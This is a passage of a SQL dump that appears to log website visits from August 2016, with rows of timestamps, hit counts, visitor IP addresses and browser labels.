719,1,1,0,0,'207.46.13.184','other'),(55053,1470710742,1,1,0,0,'151.80.31.155','other'),(55054,1470711544,1,1,0,0,'51.255.65.22','other'),(55055,1470713903,1,1,0,0,'207.46.13.184','other'),(55056,1470714025,1,1,0,0,'51.255.65.47','other'),(55057,1470714138,1,1,0,0,'37.139.165.121','chrome'),(55058,1470714824,1,1,0,0,'164.132.161.31','other'),(55059,1470714967,1,1,0,0,'207.46.13.19','other'),(55060,1470715128,1,0,1,0,'66.249.64.185',''),(55061,1470716329,1,1,0,0,'51.255.65.73','other'),(55062,1470717032,1,1,0,0,'51.255.65.62','other'),(55063,1470717758,1,1,0,0,'164.132.161.18','other'),(55064,1470718821,1,1,0,0,'151.80.31.160','other'),(55065,1470718861,1,0,1,0,'66.249.64.155',''),(55066,1470719344,1,1,0,0,'51.255.65.95','other'),(55067,1470720297,1,1,0,0,'51.255.65.28','other'),(55068,1470720315,1,1,0,0,'91.236.184.19','opera'),(55069,1470720336,1,1,0,0,'130.193.51.79','other'),(55070,1470720785,1,1,0,0,'178.92.28.77','chrome'),(55071,1470721332,1,1,0,0,'178.94.46.40','chrome'),(55072,1470721419,1,1,0,0,'164.132.161.34','other'),(55073,1470721421,1,0,1,0,'66.249.64.189',''),(55074,1470721499,1,1,0,0,'164.132.161.65','other'),(55075,1470721557,1,1,0,0,'51.255.65.90','other'),(55076,1470722590,1,1,0,0,'164.132.161.80','other'),(55077,1470722908,1,1,0,0,'207.46.13.184','other'),(55078,1470723698,1,1,0,0,'51.255.65.82','other'),(55079,1470723699,1,1,0,0,'51.255.65.51','other'),(55080,1470723915,1,1,0,0,'91.196.178.71','firefox'),(55081,1470723937,1,1,0,0,'51.255.65.89','other'),(55082,1470723996,1,1,0,0,'180.76.15.26','other'),(55083,1470724485,1,1,0,0,'91.196.178.164','chrome'),(55084,1470726707,1,1,0,0,'93.73.234.193','firefox'),(55085,1470726929,1,1,0,0,'208.115.113.82','other'),(55086,1470727875,1,1,0,0,'91.196.178.38','firefox'),(55087,1470727970,1,1,0,0,'51.255.65.34','other'),(55088,1470728135,1,1,0,0,'151.80.31.108','other'),(55089,1470728247,1,1,0,0,'31.128.100.166','chrome'),(55090,1470728512,1,1,0,0,'51.255.65.94','other'),(55091,1470728786,1,1,0,0,'164.132.161.32','other'),(55092,1470728879,1,1,0,0,'51.255.65.78','other'),(55093,1470729173,1,1,0,0,'207.46.13.184','other'),(55094,1470729949,1,1,0,0,'94.179.81.56','firefox'),(55095,1470731092,1,1,0,0,'82.145.211.114','opera'),(55096,1470732090,1,1,0,0,'208.115.113.82','other'),(55097,1470732210,1,1,0,0,'178.95.246.101','firefox'),(55098,1470732660,1,0,1,0,'66.249.64.189',''),(55099,1470732831,1,1,0,0,'193.107.108.161','msie'),(55100,1470733361,1,1,0,0,'95.135.90.157','firefox'),(55101,1470733390,1,1,0,0,'178.95.246.101','firefox'),(55102,1470733510,1,1,0,0,'37.55.52.14','opera'),(55103,1470733695,1,1,0,0,'164.132.161.78','other'),(55104,1470733701,1,1,0,0,'51.255.65.7','other'),(55105,1470734011,1,1,0,0,'91.196.178.166','chrome'),(55106,1470734220,1,1,0,0,'82.145.211.114','opera'),(55107,1470734318,1,1,0,0,'178.95.246.101','firefox'),(55108,1470734557,1,1,0,0,'51.255.65.43','other'),(55109,1470735107,1,1,0,0,'164.132.161.84','other'),(55110,1470735434,1,1,0,0,'91.196.178.164','chrome'),(55111,1470735526,1,1,0,0,'164.132.161.12','other'),(55112,1470735620,1,0,1,0,'66.249.64.187',''),(55113,1470735998,1,1,0,0,'95.135.90.157','firefox'),(55114,1470736389,1,1,0,0,'207.46.13.19','other'),(55115,1470736489,1,1,0,0,'82.145.211.114','opera'),(55116,1470736548,1,1,0,0,'51.255.65.59','other'),(55117,1470737531,1,1,0,0,'164.132.161.7','other'),(55118,1470737813,1,1,0,0,'91.196.178.71','firefox'),(55119,1470737843,1,0,1,0,'66.249.64.155',''),(55120,1470737902,1,1,0,0,'95.215.164.52','chrome'),(55121,1470738331,1,1,0,0,'151.80.31.101','other'),(55122,1470738500,1,0,1,0,'66.249.64.189',''),(55123,1470738664,1,1,0,0,'91.196.178.164','chrome'),(55124,1470738867,1,1,0,0,'151.80.31.181','other'),(55125,1470739192,1,1,0,0,'51.255.65.59','other'),(55126,1470739310,1,1,0,0,'207.46.13.19','other'),(55127,1470739403,1,1,0,0,'94.179.99.119','chrome'),(55128,1470739581,1,1,0,0,'51.254.129.91','other'),(55129,1470740646,1,1,0,0,'82.145.211.114','opera'),(55130,1470741233,1,1,0,0,'164.132.161.31','other'),(55131,1470741310,1,1,0,0,'164.132.161.7','other'),(55132,1470742503,1,1,0,0,'164.132.161.62','other'),(55133,1470742551,1,1,0,0,'51.255.65.97','other'),(55134,1470743013,1,1,0,0,'176.36.156.190','other'),(55135,1470743274,1,1,0,0,'95.135.90.157','firefox'),(55136,1470743760,1,1,0,0,'91.196.178.66','firefox'),(55137,1470743876,1,0,1,0,'66.249.64.189',''),(55138,1470744223,1,1,0,0,'207.46.13.192','other'),(55139,1470744493,1,1,0,0,'164.132.161.36','other'),(55140,1470745781,1,1,0,0,'91.196.178.70','firefox'),(55141,1470746893,1,1,0,0,'141.8.142.25','other'),(55142,1470746981,1,1,0,0,'141.0.14.133','opera'),(55143,1470747081,1,1,0,0,'66.249.64.152','chrome'),(55144,1470747488,1,1,0,0,'95.135.210.153','chrome'),(55145,1470747509,1,1,0,0,'91.196.178.98','chrome'),(55146,1470747823,1,1,0,0,'82.145.208.218','other'),(55147,1470749423,1,1,0,0,'51.255.65.55','other'),(55148,1470749528,3,3,0,0,'130.193.50.34','other'),(55149,1470749536,1,1,0,0,'130.193.51.19','other'),(55150,1470749584,1,1,0,0,'164.132.161.27','other'),(55151,1470749999,1,1,0,0,'164.132.161.97','other'),(55152,1470750120,1,0,1,0,'66.249.64.189',''),(55153,1470750796,1,1,0,0,'207.46.13.192','other'),(55154,1470751196,1,1,0,0,'130.193.50.34','other'),(55155,1470751658,1,1,0,0,'51.255.65.26','other'),(55156,1470752034,1,0,1,0,'66.249.64.185',''),(55157,1470752045,1,1,0,0,'91.196.178.165','other'),(55158,1470753511,1,1,0,0,'141.0.14.213','opera'),(55159,1470753597,1,1,0,0,'164.132.161.93','other'),(55160,1470753724,1,1,0,0,'95.135.90.157','firefox'),(55161,1470753764,1,1,0,0,'130.193.50.34','other'),(55162,1470754015,1,1,0,0,'207.46.13.19','other'),(55163,1470754195,2,2,0,0,'69.30.234.186','other'),(55164,1470754356,5,5,0,0,'209.126.127.49','other'),(55165,1470754471,2,2,0,0,'141.8.183.25','other'),(55166,1470754658,1,1,0,0,'180.76.15.18','other'),(55167,1470755594,1,1,0,0,'207.46.13.184','other'),(55168,1470756210,1,1,0,0,'151.80.31.174','other'),(55169,1470756245,1,1,0,0,'164.132.161.59','other'),(55170,1470756650,1,1,0,0,'95.135.90.157','firefox'),(55171,1470757554,1,1,0,0,'91.196.178.102','chrome'),(55172,1470758322,1,1,0,0,'141.8.183.25','other'),(55173,1470758832,1,1,0,0,'66.249.64.185','chrome'),(55174,1470759868,1,1,0,0,'79.126.129.45','firefox'),(55175,1470760257,1,0,1,0,'66.249.64.21',''),(55176,1470760655,2,2,0,0,'130.193.50.34','other'),(55177,1470760765,1,0,1,0,'66.249.64.61',''),(55178,1470761142,3,3,0,0,'88.234.164.133','other'),(55179,1470761545,1,0,1,0,'66.249.64.21',''),(55180,1470763445,1,1,0,0,'66.249.64.21','chrome'),(55181,1470764465,1,1,0,0,'208.115.113.92','other'),(55182,1470765061,1,1,0,0,'141.8.183.19','other'),(55183,1470765465,1,1,0,0,'130.193.51.79','other'),(55184,1470765654,2,2,0,0,'5.9.123.116','other'),(55185,1470766325,2,0,2,0,'66.249.64.21',''),(55186,1470766725,1,1,0,0,'207.46.13.19','other'),(55187,1470768139,4,4,0,0,'5.9.123.116','other'),(55188,1470769056,1,1,0,0,'141.0.14.141','opera'),(55189,1470769248,2,2,0,0,'130.193.50.34','other'),(55190,1470769292,2,2,0,0,'188.226.130.213','other'),(55191,1470769534,1,1,0,0,'91.244.15.73','chrome'),(55192,1470770173,1,1,0,0,'91.196.178.162','firefox'),(55193,1470771089,1,1,0,0,'207.46.13.192','other'),(55194,1470771300,1,1,0,0,'51.255.65.34','other'),(55195,1470771665,1,0,1,0,'66.249.64.21',''),(55196,1470771901,1,1,0,0,'51.255.65.40','other'),(55197,1470772053,1,1,0,0,'51.255.65.29','other'),(55198,1470772672,1,1,0,0,'91.196.178.102','chrome'),(55199,1470773991,1,1,0,0,'51.255.65.2','other'),(55200,1470774324,1,1,0,0,'164.132.161.68','other'),(55201,1470775625,1,1,0,0,'208.115.113.92','other'),(55202,1470775742,1,1,0,0,'91.196.177.40','chrome'),(55203,1470775761,1,1,0,0,'141.8.142.25','other'),(55204,1470775994,1,0,1,0,'66.249.64.21',''),(55205,1470777497,1,1,0,0,'51.255.65.66','other'),(55206,1470777789,1,1,0,0,'164.132.161.96','other'),(55207,1470778028,1,0,1,0,'66.249.64.21',''),(55208,1470778672,1,0,1,0,'66.249.64.27',''),(55209,1470779601,1,1,0,0,'141.8.183.25','other'),(55210,1470780080,1,0,1,0,'66.249.64.61',''),(55211,1470780348,1,0,1,0,'66.249.64.24',''),(55212,1470780367,1,1,0,0,'130.193.50.34','other'),(55213,1470781272,1,0,1,0,'66.249.64.61',''),(55214,1470781516,1,1,0,0,'164.132.161.46','other'),(55215,1470781732,1,0,1,0,'66.249.64.24',''),(55216,1470782490,1,1,0,0,'180.76.15.155','other'),(55217,1470782855,1,1,0,0,'130.193.50.34','other'),(55218,1470783615,1,0,1,0,'66.249.64.24',''),(55219,1470784155,1,1,0,0,'51.255.65.38','other'),(55220,1470784552,1,1,0,0,'66.249.64.27','chrome'),(55221,1470785803,1,1,0,0,'207.46.13.192','other'),(55222,1470785809,1,1,0,0,'66.249.64.24','chrome'),(55223,1470786611,1,1,0,0,'130.193.51.19','other'),(55224,1470786645,1,1,0,0,'51.255.65.57','other'),(55225,1470787337,1,1,0,0,'141.8.183.25','other'),(55226,1470787619,1,1,0,0,'40.77.167.32','other'),(55227,1470788202,18,18,0,0,'61.14.225.51','other'),(55228,1470788443,1,1,0,0,'130.193.50.34','other'),(55229,1470788847,1,1,0,0,'173.169.187.130','firefox'),(55230,1470788872,1,0,1,0,'66.249.64.59',''),(55231,1470788913,1,1,0,0,'207.46.13.67','other'),(55232,1470789250,1,1,0,0,'130.193.37.21','other'),(55233,1470789300,1,1,0,0,'130.193.50.4','other'),(55234,1470789307,1,1,0,0,'178.154.149.11','other'),(55235,1470789657,1,1,0,0,'93.158.152.84','other'),(55236,1470789996,1,1,0,0,'130.193.50.32','other'),(55237,1470790121,1,1,0,0,'5.255.253.67','other'),(55238,1470790288,1,1,0,0,'93.158.152.9','other'),(55239,1470790292,1,1,0,0,'5.255.253.53','other'),(55240,1470790368,1,1,0,0,'141.8.142.67','other'),(55241,1470790740,1,1,0,0,'51.255.65.62','other'),(55242,1470790748,1,1,0,0,'208.115.113.82','other'),(55243,1470791574,1,1,0,0,'151.80.31.159','other'),(55244,1470791850,1,1,0,0,'82.145.210.240','opera'),(55245,1470792116,1,1,0,0,'66.249.64.27','chrome'),(55246,1470792542,1,1,0,0,'164.132.161.62','other'),(55247,1470792545,1,1,0,0,'180.76.15.33','other'),(55248,1470792757,1,1,0,0,'208.115.113.92','other'),(55249,1470794422,1,1,0,0,'93.158.152.9','other'),(55250,1470795780,1,1,0,0,'141.8.142.85','other'),(55251,1470795864,1,1,0,0,'141.8.183.19','other'),(55252,1470795974,1,1,0,0,'51.255.65.56','other'),(55253,1470796796,1,0,1,0,'66.249.64.27',''),(55254,1470797764,1,1,0,0,'51.255.65.44','other'),(55255,1470797942,1,1,0,0,'51.255.65.4','other'),(55256,1470798449,1,1,0,0,'130.193.50.34','other'),(55257,1470800424,1,0,1,0,'66.249.64.24',''),(55258,1470801172,1,1,0,0,'51.255.65.36','other'),(55259,1470801374,1,1,0,0,'164.132.161.83','other'),(55260,1470802044,1,1,0,0,'91.244.15.73','chrome'),(55261,1470802244,32,32,0,0,'213.251.184.38','other'),(55262,1470802775,1,1,0,0,'66.249.64.21','chrome'),(55263,1470803321,1,1,0,0,'51.255.65.59','other'),(55264,1470803387,1,1,0,0,'164.132.161.4','other'),(55265,1470803789,1,0,1,0,'66.249.64.25',''),(55266,1470804072,1,1,0,0,'51.255.65.51','other'),(55267,1470804387,1,1,0,0,'164.132.161.89','other'),(55268,1470805366,1,1,0,0,'40.77.167.32','other'),(55269,1470805828,1,0,1,0,'66.249.64.24',''),(55270,1470806262,1,1,0,0,'130.180.218.18','chrome'),(55271,1470806538,1,0,1,0,'66.249.64.27',''),(55272,1470806571,1,1,0,0,'164.132.161.82','other'),(55273,1470806681,1,0,1,0,'66.249.64.61',''),(55275,1470807817,1,1,0,0,'78.111.187.34','chrome'),(55276,1470807885,1,1,0,0,'207.46.13.192','other'),(55277,1470807948,1,0,1,0,'66.249.64.27',''),(55278,1470808108,1,1,0,0,'141.8.183.25','other'),(55279,1470808299,1,1,0,0,'51.255.65.86','other'),(55280,1470808382,1,1,0,0,'94.179.71.205','firefox'),(55281,1470808426,1,1,0,0,'141.8.142.58','other'),(55282,1470809022,1,1,0,0,'37.53.227.22','chrome'),(55283,1470809061,1,1,0,0,'178.93.209.158','chrome'),(55284,1470809964,1,1,0,0,'51.255.65.48','other'),(55285,1470810361,1,1,0,0,'207.46.13.192','other'),(55286,1470810861,1,1,0,0,'51.255.65.53','other'),(55287,1470811085,1,1,0,0,'164.132.161.21','other'),(55288,1470811186,1,0,1,0,'66.249.64.27',''),(55289,1470811311,1,0,1,0,'66.249.64.59',''),(55290,1470811331,1,1,0,0,'207.46.13.192','other'),(55291,1470811609,1,1,0,0,'180.76.15.160','other'),(55292,1470811614,1,1,0,0,'66.249.93.109','chrome'),(55293,1470811724,1,1,0,0,'51.255.65.12','other'),(55294,1470811794,1,1,0,0,'141.8.142.67','other'),(55295,1470811796,1,1,0,0,'141.0.15.173','opera'),(55296,1470812625,1,1,0,0,'194.44.134.10','chrome'),(55297,1470812629,1,1,0,0,'91.196.178.166','chrome'),(55298,1470812670,2,2,0,0,'94.45.144.246','chrome'),(55299,1470812966,1,1,0,0,'141.8.142.58','other'),(55300,1470813047,1,1,0,0,'51.255.65.42','other'),(55301,1470813691,1,1,0,0,'178.92.150.239','chrome'),(55302,1470813892,1,1,0,0,'141.8.142.67','other'),(55303,1470814552,1,1,0,0,'195.69.222.18','firefox'),(55304,1470814560,1,1,0,0,'95.27.142.134','chrome'),(55305,1470814561,1,1,0,0,'128.72.229.15','chrome'),(55306,1470814563,1,1,0,0,'5.228.59.217','chrome'),(55308,1470814564,1,1,0,0,'89.178.91.5','msie'),(55309,1470814834,1,1,0,0,'94.179.17.58','chrome'),(55310,1470814963,1,1,0,0,'46.219.249.236','opera'),(55311,1470814968,1,1,0,0,'51.255.65.83','other'),(55312,1470815080,1,1,0,0,'91.196.178.72','firefox'),(55313,1470815274,1,1,0,0,'141.0.12.138','chrome'),(55314,1470815328,1,1,0,0,'208.115.113.92','other'),(55315,1470816016,1,1,0,0,'51.255.65.57','other'),(55316,1470816335,1,1,0,0,'51.255.65.51','other'),(55317,1470816507,1,1,0,0,'141.0.14.92','opera'),(55318,1470816833,1,1,0,0,'46.219.252.160','chrome'),(55319,1470817066,1,1,0,0,'141.8.142.61','other'),(55320,1470818072,2,2,0,0,'130.193.51.19','other'),(55321,1470818077,1,0,1,0,'66.249.64.21',''),(55322,1470818331,1,1,0,0,'213.5.193.45','chrome'),(55323,1470818816,1,0,1,0,'66.249.64.27',''),(55324,1470820302,1,1,0,0,'141.8.142.61','other'),(55325,1470820549,1,1,0,0,'93.171.172.136','chrome'),(55326,1470820655,2,2,0,0,'130.193.51.19','other'),(55327,1470820705,3,3,0,0,'62.80.171.10','firefox'),(55328,1470820901,1,1,0,0,'208.115.113.92','other'),(55329,1470820998,1,1,0,0,'78.154.164.236','chrome'),(55330,1470821428,2,2,0,0,'66.249.93.113','chrome'),(55331,1470821532,1,1,0,0,'46.211.153.244','chrome'),(55332,1470821545,1,1,0,0,'207.46.13.85','other'),(55333,1470821603,1,1,0,0,'46.211.113.187','chrome'),(55334,1470821783,1,1,0,0,'66.249.81.202','chrome'),(55335,1470821854,1,1,0,0,'66.249.81.205','chrome'),(55336,1470822240,1,1,0,0,'130.193.50.34','other'),(55337,1470822839,1,1,0,0,'95.135.212.239','firefox'),(55338,1470822911,1,1,0,0,'91.196.178.68','firefox'),(55339,1470824047,1,1,0,0,'91.196.178.68','firefox'),(55340,1470824331,1,1,0,0,'94.179.32.1','chrome'),(55341,1470824403,2,2,0,0,'141.8.142.58','other'),(55342,1470824489,1,1,0,0,'130.193.51.19','other'),(55343,1470824495,1,1,0,0,'141.8.142.61','other'),(55344,1470824719,1,1,0,0,'66.249.64.24','chrome'),(55345,1470824779,1,1,0,0,'66.249.64.27','chrome'),(55346,1470825146,1,1,0,0,'91.196.178.72','firefox'),(55347,1470825903,1,0,1,0,'66.249.64.21',''),(55348,1470826025,1,1,0,0,'104.131.45.62','other'),(55349,1470826247,1,1,0,0,'193.34.141.59','chrome'),(55350,1470826329,1,1,0,0,'95.135.90.157','firefox'),(55351,1470826653,1,1,0,0,'141.8.142.58','other'),(55352,1470827331,1,1,0,0,'91.196.178.131','chrome'),(55353,1470827403,1,1,0,0,'92.113.153.156','firefox'),(55354,1470827428,1,1,0,0,'130.193.50.34','other'),(55355,1470828814,1,0,1,0,'66.249.64.27',''),(55356,1470829681,1,1,0,0,'66.249.64.21','chrome'),(55357,1470829880,1,1,0,0,'141.8.183.25','other'),(55358,1470829955,1,1,0,0,'66.249.64.57','chrome'),(55359,1470829979,1,1,0,0,'94.179.159.50','chrome'),(55360,1470830333,1,1,0,0,'82.145.211.102','opera'),(55361,1470830734,1,1,0,0,'91.196.177.94','chrome'),(55362,1470830808,1,1,0,0,'95.135.212.239','firefox'),(55363,1470830811,1,1,0,0,'66.102.9.103','chrome'),(55364,1470830974,1,1,0,0,'95.132.87.104','chrome'),(55365,1470831104,2,0,2,0,'66.249.64.21',''),(55366,1470831821,1,1,0,0,'91.196.177.94','chrome'),(55367,1470832068,1,1,0,0,'94.179.159.50','chrome'),(55368,1470832463,1,1,0,0,'37.54.134.97','firefox'),(55369,1470832941,1,1,0,0,'141.8.183.25','other'),(55370,1470833211,1,1,0,0,'141.0.14.201','opera'),(55371,1470833252,1,1,0,0,'217.196.168.65','firefox'),(55372,1470833390,1,1,0,0,'91.196.178.72','firefox'),(55373,1470833393,1,1,0,0,'130.193.51.19','other'),(55374,1470833420,1,1,0,0,'95.135.212.239','firefox'),(55375,1470833522,1,1,0,0,'194.44.134.10','chrome'),(55376,1470834366,1,1,0,0,'91.196.177.94','chrome'),(55377,1470834398,1,1,0,0,'95.135.212.239','firefox'),(55378,1470834528,1,1,0,0,'180.76.15.7','other'),(55379,1470834549,1,1,0,0,'207.46.13.85','other'),(55380,1470834864,1,1,0,0,'91.196.178.161','chrome'),(55381,1470835046,1,1,0,0,'130.193.51.19','other'),(55382,1470835545,2,2,0,0,'95.135.212.239','firefox'),(55383,1470835585,1,1,0,0,'141.8.183.25','other'),(55384,1470835647,1,0,1,0,'66.249.64.57',''),(55385,1470835809,1,1,0,0,'82.145.219.170','other'),(55386,1470836313,1,1,0,0,'208.115.113.92','other'),(55387,1470836595,1,1,0,0,'40.77.167.32','other'),(55388,1470836617,2,2,0,0,'91.124.24.10','chrome'),(55389,1470836763,1,1,0,0,'91.196.178.72','chrome'),(55390,1470837008,1,1,0,0,'93.171.245.192','chrome'),(55391,1470837022,1,1,0,0,'141.8.142.58','other'),(55392,1470837321,1,1,0,0,'207.46.13.192','other'),(55393,1470837845,1,1,0,0,'95.108.133.223','chrome'),(55394,1470838898,1,1,0,0,'40.77.167.32','other'),(55395,1470839235,1,1,0,0,'91.204.87.89','chrome'),(55396,1470839293,1,1,0,0,'141.0.14.201','opera'),(55397,1470840860,1,0,1,0,'66.249.64.27',''),(55398,1470841256,1,1,0,0,'95.132.21.105','chrome'),(55399,1470841272,1,1,0,0,'141.8.183.25','other'),(55400,1470841636,1,0,1,0,'66.249.64.61',''),(55401,1470841876,1,1,0,0,'66.249.64.57','chrome'),(55402,1470842719,1,1,0,0,'40.77.167.32','other'),(55403,1470843011,1,1,0,0,'91.196.178.65','chrome'),(55404,1470844172,1,0,1,0,'66.249.64.21',''),(55405,1470844495,113,113,0,0,'136.243.152.18','other'),(55406,1470845467,1,1,0,0,'207.46.13.67','other'),(55407,1470846432,1,1,0,0,'207.46.13.67','other'),(55408,1470846830,1,1,0,0,'37.53.116.240','chrome'),(55409,1470847816,1,1,0,0,'91.196.178.72','firefox'),(55410,1470847972,1,1,0,0,'107.21.1.8','other'),(55411,1470848522,1,0,1,0,'66.249.64.21',''),(55412,1470848558,1,0,1,0,'66.249.64.24',''),(55413,1470849069,1,1,0,0,'46.63.51.178','chrome'),(55414,1470849423,1,0,1,0,'66.249.64.61',''),(55415,1470849529,1,0,1,0,'66.249.64.57',''),(55416,1470849758,1,0,1,0,'66.249.64.21',''),(55417,1470849827,1,1,0,0,'188.115.129.149','chrome'),(55418,1470850845,1,0,1,0,'66.249.64.61',''),(55419,1470850979,1,1,0,0,'141.0.14.241','other'),(55420,1470851142,1,1,0,0,'208.115.113.92','other'),(55421,1470851235,1,1,0,0,'94.179.18.62','chrome'),(55422,1470851251,1,1,0,0,'141.8.132.52','other'),(55423,1470851254,1,1,0,0,'130.193.51.79','other'),(55424,1470851599,1,1,0,0,'207.46.13.67','other'),(55425,1470854294,1,1,0,0,'213.5.193.94','other'),(55426,1470854568,1,1,0,0,'207.46.13.67','other'),(55427,1470856319,1,0,1,0,'66.249.64.24',''),(55428,1470857412,1,1,0,0,'180.76.15.15','other'),(55429,1470857896,3,0,3,0,'68.180.230.111',''),(55430,1470859067,1,0,1,0,'66.249.64.57',''),(55431,1470859409,1,1,0,0,'40.77.167.32','other'),(55432,1470859747,1,1,0,0,'91.196.178.101','chrome'),(55433,1470861112,2,2,0,0,'195.154.185.20','other'),(55434,1470862016,1,1,0,0,'66.249.64.187','chrome'),(55435,1470863484,1,1,0,0,'66.249.64.152','chrome'),(55436,1470865364,1,0,1,0,'66.249.64.187',''),(55437,1470865468,1,0,1,0,'66.249.64.152',''),(55438,1470868113,1,0,1,0,'66.249.64.185',''),(55439,1470868241,1,1,0,0,'66.249.64.185','chrome'),(55440,1470869955,1,1,0,0,'66.249.64.189','chrome'),(55441,1470871390,1,0,1,0,'66.249.64.185',''),(55442,1470872482,1,0,1,0,'66.249.64.185',''),(55443,1470873478,1,0,1,0,'66.249.64.185',''),(55444,1470873743,1,0,1,0,'66.249.64.187',''),(55445,1470875572,2,2,0,0,'66.249.64.185','chrome'),(55446,1470877484,1,0,1,0,'66.249.64.152',''),(55447,1470877730,2,1,1,0,'66.249.64.149',''),(55448,1470877740,1,0,1,0,'66.249.64.189',''),(55449,1470878923,1,0,1,0,'66.249.64.189',''),(55450,1470882600,1,0,1,0,'66.249.64.189',''),(55451,1470882617,1,0,1,0,'68.180.230.111',''),(55452,1470882700,3,3,0,0,'138.201.127.112','other'),(55453,1470885131,1,1,0,0,'208.115.113.82','other'),(55454,1470887640,1,1,0,0,'217.69.133.169','firefox'),(55455,1470888489,1,1,0,0,'91.244.15.73','chrome'),(55456,1470888680,1,1,0,0,'130.193.50.34','other'),(55457,1470888787,1,1,0,0,'40.77.167.32','other'),(55458,1470889155,1,0,1,0,'66.249.64.152',''),(55459,1470890192,1,0,1,0,'66.249.64.187',''),(55460,1470890316,1,1,0,0,'124.13.213.36','firefox'),(55461,1470890502,1,0,1,0,'66.249.64.152',''),(55462,1470891203,1,1,0,0,'208.115.113.82','other'),(55463,1470891961,1,1,0,0,'91.196.178.135','firefox'),(55464,1470892196,1,0,1,0,'66.249.64.185',''),(55465,1470892359,1,1,0,0,'130.193.51.19','other'),(55466,1470892501,1,1,0,0,'194.44.134.10','chrome'),(55467,1470893007,1,1,0,0,'40.77.167.32','other'),(55468,1470893326,2,0,2,0,'66.249.64.152',''),(55469,1470893340,1,1,0,0,'207.46.13.192','other'),(55470,1470893571,1,1,0,0,'91.196.178.66','firefox'),(55471,1470894088,1,0,1,0,'66.249.64.185',''),(55472,1470894193,1,1,0,0,'66.249.93.113','chrome'),(55473,1470894290,1,0,1,0,'66.249.64.189',''),(55474,1470894457,1,1,0,0,'130.193.51.19','other'),(55475,1470894696,1,1,0,0,'141.8.183.25','other'),(55476,1470895165,1,1,0,0,'176.111.33.18','firefox'),(55477,1470895602,2,2,0,0,'37.54.45.233','chrome'),(55478,1470896378,1,0,1,0,'66.249.64.189',''),(55479,1470897080,1,1,0,0,'5.45.197.182','other'),(55480,1470897099,1,1,0,0,'91.196.178.68','firefox'),(55481,1470897356,1,1,0,0,'194.44.134.10','chrome'),(55482,1470897370,1,1,0,0,'180.76.15.155','other'),(55483,1470897411,2,0,2,0,'66.249.64.187',''),(55484,1470897817,1,1,0,0,'37.53.225.237','firefox'),(55485,1470899272,1,1,0,0,'178.93.45.203','chrome'),(55486,1470900465,2,2,0,0,'193.219.124.33','other'),(55487,1470900522,1,1,0,0,'40.77.167.32','other'),(55488,1470900715,2,0,2,0,'66.249.64.185',''),(55489,1470901494,1,1,0,0,'91.196.178.164','chrome'),(55490,1470901495,1,0,1,0,'66.249.64.187',''),(55491,1470902953,1,1,0,0,'130.193.51.43','other'),(55492,1470903170,1,0,1,0,'66.249.64.189',''),(55493,1470903348,2,2,0,0,'207.46.13.67','other'),(55494,1470903743,1,1,0,0,'194.146.191.195','chrome'),(55495,1470903999,1,1,0,0,'87.244.183.92','chrome'),(55496,1470904123,1,1,0,0,'176.241.109.84','firefox'),(55497,1470904391,1,1,0,0,'91.196.178.98','chrome'),(55498,1470905248,1,1,0,0,'208.115.113.82','other'),(55499,1470905480,1,1,0,0,'91.196.178.98','chrome'),(55500,1470906006,1,1,0,0,'91.196.178.169','chrome'),(55501,1470906474,1,1,0,0,'178.93.208.23','chrome'),(55502,1470906826,2,2,0,0,'157.55.39.196','other'),(55503,1470906966,1,0,1,0,'66.249.64.189',''),(55504,1470906996,1,0,1,0,'66.249.64.185',''),(55505,1470907139,1,0,1,0,'66.249.64.187',''),(55506,1470907859,1,1,0,0,'208.115.113.92','other'),(55507,1470908504,1,1,0,0,'37.53.225.237','firefox'),(55508,1470910280,1,0,1,0,'66.249.64.187',''),(55509,1470910464,1,0,1,0,'66.249.64.149',''),(55510,1470910640,1,1,0,0,'91.196.178.101','chrome'),(55511,1470912181,1,1,0,0,'141.8.142.58','other'),(55512,1470912869,1,1,0,0,'91.196.178.101','chrome'),(55513,1470913705,1,1,0,0,'157.55.39.196','other'),(55514,1470913988,1,0,1,0,'66.249.64.185',''),(55515,1470914206,1,1,0,0,'40.77.167.32','other'),(55516,1470914768,2,2,0,0,'130.193.51.19','other'),(55517,1470915336,1,0,1,0,'66.249.64.187',''),(55518,1470915823,1,1,0,0,'141.8.183.25','other'),(55519,1470916325,4,4,0,0,'5.9.85.4','other'),(55520,1470916857,1,1,0,0,'188.40.95.70','other'),(55521,1470917583,1,1,0,0,'94.179.98.116','firefox'),(55522,1470917969,1,1,0,0,'141.8.183.25','other'),(55523,1470918444,1,1,0,0,'37.55.73.159','chrome'),(55524,1470918695,1,1,0,0,'91.196.178.65','firefox'),(55525,1470919111,1,0,1,0,'66.249.64.187',''),(55526,1470919638,2,2,0,0,'91.196.178.65','firefox'),(55527,1470920165,1,1,0,0,'66.249.64.185','chrome'),(55528,1470920274,1,1,0,0,'66.249.64.155','chrome'),(55529,1470920559,1,1,0,0,'31.43.5.95','chrome'),(55530,1470920625,5,5,0,0,'62.210.250.212','other'),(55531,1470920972,2,2,0,0,'142.54.184.90','other'),(55532,1470922695,1,1,0,0,'141.8.142.61','other'),(55533,1470923067,1,1,0,0,'141.8.142.58','other'),(55534,1470923149,1,1,0,0,'91.196.178.169','opera'),(55535,1470923430,1,1,0,0,'66.102.9.103','chrome'),(55536,1470923783,1,0,1,0,'66.249.64.185',''),(55537,1470924532,1,1,0,0,'91.196.178.70','firefox'),(55538,1470924737,1,0,1,0,'66.249.64.187',''),(55539,1470925396,1,1,0,0,'93.158.152.84','other'),(55540,1470925839,1,1,0,0,'91.196.178.164','chrome'),(55541,1470926481,1,1,0,0,'37.53.225.237','firefox'),(55542,1470927123,1,1,0,0,'46.211.156.130','chrome'),(55543,1470927362,2,2,0,0,'142.54.184.90','other'),(55544,1470929041,2,2,0,0,'40.77.167.32','other'),(55545,1470929269,1,1,0,0,'207.46.13.67','other'),(55546,1470929283,1,1,0,0,'157.55.39.233','other'),(55547,1470929351,2,0,2,0,'66.249.64.185',''),(55548,1470929984,1,0,1,0,'66.249.64.187',''),(55549,1470930141,1,1,0,0,'51.255.36.85','other'),(55550,1470930527,1,1,0,0,'66.102.8.155','chrome'),(55551,1470930877,1,1,0,0,'66.249.64.149','chrome'),(55552,1470930976,3,0,3,0,'66.249.64.187',''),(55553,1470931059,1,0,1,0,'66.249.64.189',''),(55554,1470931064,1,0,1,0,'66.249.64.185',''),(55555,1470931210,1,0,1,0,'66.249.64.155',''),(55556,1470931752,1,1,0,0,'212.55.73.190','chrome'),(55557,1470933181,1,1,0,0,'208.115.113.82','other'),(55558,1470933269,1,1,0,0,'157.55.39.233','other'),(55559,1470933617,1,0,1,0,'66.249.64.59',''),(55560,1470933698,1,1,0,0,'69.197.177.50','other'),(55561,1470934162,1,0,1,0,'66.249.64.57',''),(55562,1470935286,1,1,0,0,'208.115.113.82','other'),(55563,1470935468,